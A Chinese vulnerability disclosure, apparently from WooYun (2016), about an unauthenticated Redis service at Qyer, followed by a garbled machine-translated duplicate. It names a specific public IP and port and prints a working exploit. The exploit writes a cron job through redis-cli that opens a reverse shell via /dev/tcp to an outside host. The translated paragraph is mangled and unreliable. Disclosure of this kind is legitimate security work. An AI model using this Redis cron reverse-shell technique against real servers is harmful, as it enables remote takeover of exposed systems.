穷游网某服务未授权访问(可远程SHELL)

漏洞标题 穷游网某服务未授权访问(可远程SHELL) 相关厂商 穷游网 漏洞作者 猪猪侠 提交时间 2016-05-03 12:54 公开时间 2016-06-17 14:10 漏洞类型 未授权访问/…

漏洞标题 差旅差网络服务未授权访问(远程SHELL) 相关制造商 差旅网络 漏洞作者 猪人 提交时间 2016-05-03 12: 54 公共时间 2016-06-17 14: 10 漏洞类型 未经授权的访问/许可绕过 危险等级 高 自我评估等级 20 漏洞状态 制造商已确认 标签标签 漏洞详细信息 #1漏洞参考 WooYun:新浪微博服务器未正确控制(远程SHELL) #2 redis服务向公众开放 Redis: //115.182.69.199: 3000 #3可以管理奴隶 #Keyspace Db0: keys=65454963,expires=130654,avg_ttl=30413755756 #Replication 角色:主人 Connected_slaves: 1 Slave0: ip=10.1.1.15,port=6379,state=online,offset=271341594993,lag=1 Master_repl_offset: 271341599570 配置得到目录 94)'/u01/redis/data' 漏洞证明: 650万个密钥,不敢执行flush命令来测试损坏数据,只需证明 #exploit,创建任务计划,执行命令 Echo -e'\ n \ n */1 * * * */bin/bash -i>& /dev/tcp/114.114.114.114/53 0>& 1 \ n \ n'| redis-cli - h 115.182.69.199 -p 3000 -x set 0 配置设置目录/var/spool/cron / 配置set dbfilename root 修理计划: #Set访问控制 版权声明:转载请注明出处猪猪人@乌云